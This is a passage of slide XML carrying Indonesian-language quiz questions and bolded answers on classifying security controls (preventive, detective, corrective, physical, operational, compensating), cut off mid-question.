            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Technical / Preventive control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sorot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usahanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Physical / Detective control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sorot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> visual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanggar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. DUA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Detective &amp; Corrective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (detective), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (corrective)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompensasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Operational = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> proses/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, Compensating = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multinasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelektual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IP) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
